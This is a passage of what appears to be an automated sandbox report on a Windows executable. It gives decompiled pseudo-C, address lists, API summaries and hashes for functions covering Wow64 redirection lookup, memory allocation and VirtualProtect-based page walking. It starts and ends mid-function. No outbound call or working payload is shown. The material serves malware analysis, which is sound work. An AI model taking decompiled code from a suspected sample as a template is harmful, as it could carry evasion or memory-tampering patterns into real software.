				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}









                                                            0x004b5a90
                                                            0x004b5a93
                                                            0x004b5a95
                                                            0x004b5a97
                                                            0x004b5a9b
                                                            0x004b5a9c
                                                            0x004b5aa1
                                                            0x004b5aa4
                                                            0x004b5aa7
                                                            0x004b5aae
                                                            0x004b5ac9
                                                            0x004b5ae3
                                                            0x004b5aef
                                                            0x004b5afa
                                                            0x004b5afe
                                                            0x004b5afe
                                                            0x004b5afe
                                                            0x004b5b00
                                                            0x004b5b08
                                                            0x004b5b13
                                                            0x004b5b20
                                                            0x004b5b2d
                                                            0x004b5b3a
                                                            0x004b5b3a
                                                            0x004b5b41
                                                            0x004b5b44
                                                            0x004b5b47
                                                            0x004b5b59

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                            • API String ID: 1646373207-2130885113
                                                            • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                            • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                            • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                            • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x99aad0
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x99aad0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x99aaf0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                            0x00403ee8
                                                            0x00403ef4
                                                            0x00403efa
                                                            0x00404148
                                                            0x0040414d
                                                            0x00404260
                                                            0x00404261
                                                            0x00404263
                                                            0x00403c94
                                                            0x00403c98
                                                            0x00403c9a
                                                            0x00403ca4
                                                            0x00403cb4
                                                            0x00403cb9
                                                            0x00403cbd
                                                            0x00403cbf
                                                            0x00403cc1
                                                            0x00403cc7
                                                            0x00403cca
                                                            0x00403ccf
                                                            0x00403cd4
                                                            0x00403cda
                                                            0x00403ce0
                                                            0x00403ce3
                                                            0x00403ce5
                                                            0x00403cec
                                                            0x00403cec
                                                            0x00403cf5
                                                            0x00404269
                                                            0x00404269
                                                            0x0040426b
                                                            0x0040426b
                                                            0x00404153
                                                            0x00404153
                                                            0x0040415f
                                                            0x00404162
                                                            0x00404164
                                                            0x0040410c
                                                            0x00404111
                                                            0x00404119
                                                            0x00000000
                                                            0x00000000
                                                            0x0040411b
                                                            0x0040411d
                                                            0x00404124
                                                            0x00000000
                                                            0x00404126
                                                            0x00404128
                                                            0x00404132
                                                            0x0040413a
                                                            0x0040413e
                                                            0x00000000
                                                            0x0040413e
                                                            0x0040413a
                                                            0x00000000
                                                            0x00404124
                                                            0x0040410c
                                                            0x00404166
                                                            0x00404166
                                                            0x00404166
                                                            0x0040416e
                                                            0x00404171
                                                            0x0040417b
                                                            0x0040417b
                                                            0x00404182
                                                            0x00404195
                                                            0x00404199
                                                            0x0040419f
                                                            0x004041b8
                                                            0x004041be
                                                            0x004041be
                                                            0x004041c0
                                                            0x004041de
                                                            0x004041c2
                                                            0x004041c2
                                                            0x004041c7
                                                            0x004041c9
                                                            0x004041ce
                                                            0x004041d7
                                                            0x004041d7
                                                            0x004041e3
                                                            0x004041eb
                                                            0x004041a1
                                                            0x004041a1
                                                            0x004041ab
                                                            0x004041b3
                                                            0x00000000
                                                            0x004041b3
                                                            0x00404184
                                                            0x00404187
                                                            0x0040418a
                                                            0x004041ec
                                                            0x004041ec
                                                            0x004041ed
                                                            0x004041ee
                                                            0x004041f5
                                                            0x004041f8
                                                            0x004041fb
                                                            0x004041fe
                                                            0x00404200
                                                            0x00404202
                                                            0x00404209
                                                            0x0040420b
                                                            0x0040420b
                                                            0x0040420b
                                                            0x00404212
                                                            0x00404214
                                                            0x00404214
                                                            0x00404212
                                                            0x00404220
                                                            0x00404225
                                                            0x00404225
                                                            0x00404227
                                                            0x00404248
                                                            0x00404248
                                                            0x00404248
                                                            0x00404229
                                                            0x00404229
                                                            0x0040422f
                                                            0x00404232
                                                            0x00404236
                                                            0x0040423c
                                                            0x0040423e
                                                            0x0040423e
                                                            0x0040423c
                                                            0x0040424d
                                                            0x00404250
                                                            0x00404253
                                                            0x0040425f
                                                            0x0040425f
                                                            0x00404182
                                                            0x00403f00
                                                            0x00403f00
                                                            0x00403f02
                                                            0x00403f02
                                                            0x00403f09
                                                            0x00403f10
                                                            0x00403f68
                                                            0x00403f68
                                                            0x00403f6d
                                                            0x00403f71
                                                            0x00000000
                                                            0x00000000
                                                            0x00403f73
                                                            0x00403f73
                                                            0x00403f76
                                                            0x00403f7b
                                                            0x00403f7f
                                                            0x00403f81
                                                            0x00403f81
                                                            0x00403f84
                                                            0x00403f89
                                                            0x00403f8d
                                                            0x00403f8f
                                                            0x00403f92
                                                            0x00403f94
                                                            0x00403f9b
                                                            0x00000000
                                                            0x00403f9d
                                                            0x00403f9f
                                                            0x00403fa4
                                                            0x00403fa9
                                                            0x00403fad
                                                            0x00403fb5
                                                            0x00000000
                                                            0x00403fb5
                                                            0x00403fad
                                                            0x00403f9b
                                                            0x00403f8d
                                                            0x00000000
                                                            0x00403f7f
                                                            0x00403f68
                                                            0x00403f12
                                                            0x00403f12
                                                            0x00403f15
                                                            0x00403f18
                                                            0x00403f1d
                                                            0x00403f1f
                                                            0x00403f38
                                                            0x00403f3b
                                                            0x00403f3f
                                                            0x00403f41
                                                            0x00403f44
                                                            0x00403fbc
                                                            0x00403fbd
                                                            0x00403fbe
                                                            0x00403fc5
                                                            0x00403fc7
                                                            0x00403fc7
                                                            0x00403fcc
                                                            0x00403fd4
                                                            0x00000000
                                                            0x00000000
                                                            0x00403fd6
                                                            0x00403fd8
                                                            0x00403fdf
                                                            0x00000000
                                                            0x00403fe1
                                                            0x00403fe3
                                                            0x00403fe8
                                                            0x00403fed
                                                            0x00403ff5
                                                            0x00403ff9
                                                            0x00000000
                                                            0x00403ff9
                                                            0x00403ff5
                                                            0x00000000
                                                            0x00403fdf
                                                            0x00403fc7
                                                            0x00404000
                                                            0x00404004
                                                            0x00404004
                                                            0x0040400a
                                                            0x0040407c
                                                            0x00404080
                                                            0x00404086
                                                            0x00404088
                                                            0x004040b0
                                                            0x004040b4
                                                            0x004040b6
                                                            0x004040bb
                                                            0x004040bd
                                                            0x004040bf
                                                            0x00000000
                                                            0x004040c1
                                                            0x004040c1
                                                            0x004040c6
                                                            0x004040c8
                                                            0x004040c9
                                                            0x004040ca
                                                            0x004040cb
                                                            0x004040cb
                                                            0x0040408a
                                                            0x0040408a
                                                            0x00404090
                                                            0x00404094
                                                            0x0040409a
                                                            0x0040409c
                                                            0x0040409e
                                                            0x0040409e
                                                            0x004040a0
                                                            0x004040a2
                                                            0x004040a8
                                                            0x00000000
                                                            0x004040a8
                                                            0x0040400c
                                                            0x0040400c
                                                            0x0040400f
                                                            0x00404016
                                                            0x0040401d
                                                            0x00404020
                                                            0x00404023
                                                            0x0040402a
                                                            0x0040402d
                                                            0x00404030
                                                            0x00404033
                                                            0x00404035
                                                            0x00404037
                                                            0x00404039
                                                            0x0040403e
                                                            0x00404040
                                                            0x00404040
                                                            0x00404040
                                                            0x00404047
                                                            0x00404049
                                                            0x00404049
                                                            0x00404047
                                                            0x00404050
                                                            0x00404055
                                                            0x00404058
                                                            0x0040405e
                                                            0x004040cc
                                                            0x004040cc
                                                            0x004040cc
                                                            0x00404060
                                                            0x00404060
                                                            0x00404062
                                                            0x00404066
                                                            0x00404068
                                                            0x0040406b
                                                            0x0040406e
                                                            0x00404071
                                                            0x00404075
                                                            0x00404075
                                                            0x004040d1
                                                            0x004040d1
                                                            0x004040d1
                                                            0x004040d4
                                                            0x004040d7
                                                            0x004040d9
                                                            0x004040de
                                                            0x004040e0
                                                            0x004040e3
                                                            0x004040ea
                                                            0x004040ed
                                                            0x004040ed
                                                            0x004040f0
                                                            0x004040f4
                                                            0x004040f7
                                                            0x004040fa
                                                            0x004040fc
                                                            0x004040fc
                                                            0x004040fe
                                                            0x00404101
                                                            0x00404104
                                                            0x00404107
                                                            0x00404108
                                                            0x00404109
                                                            0x0040410a
                                                            0x0040410a
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f4a
                                                            0x00403f4d
                                                            0x00403f50
                                                            0x00403f53
                                                            0x00403f54
                                                            0x00403f54
                                                            0x00403f21
                                                            0x00403f21
                                                            0x00403f25
                                                            0x00403f25
                                                            0x00403f28
                                                            0x00403f2b
                                                            0x00403f2e
                                                            0x00403f58
                                                            0x00403f5b
                                                            0x00403f5e
                                                            0x00403f61
                                                            0x00403f64
                                                            0x00403f65
                                                            0x00403f30
                                                            0x00403f30
                                                            0x00403f33
                                                            0x00403f34
                                                            0x00403f34
                                                            0x00403f2e
                                                            0x00403f1f

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                            • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                            • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                            • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}













                                                            0x004af920
                                                            0x004af923
                                                            0x004af926
                                                            0x004af92f
                                                            0x004af93b
                                                            0x004af942
                                                            0x004af9ee
                                                            0x004af9ee
                                                            0x004af948
                                                            0x004af9db
                                                            0x004af9db
                                                            0x004af9e1
                                                            0x00000000
                                                            0x00000000
                                                            0x004af954
                                                            0x004af9c7
                                                            0x004af9d2
                                                            0x004af9d9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004af95c
                                                            0x004af95c
                                                            0x004af961
                                                            0x004af967
                                                            0x004af986
                                                            0x004af98d
                                                            0x004af98f
                                                            0x004af98f
                                                            0x004af98d
                                                            0x004af994
                                                            0x004af9a5
                                                            0x004af99c
                                                            0x004af9a1
                                                            0x004af9a1
                                                            0x004af9af
                                                            0x004af9c2
                                                            0x004af9c2
                                                            0x00000000
                                                            0x004af9af
                                                            0x004af954
                                                            0x00000000
                                                            0x004af9db

                                                            APIs
                                                            • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                            • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                            • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                            • String ID:
                                                            • API String ID: 2441996862-0
                                                            • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                            • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                            • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                            • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
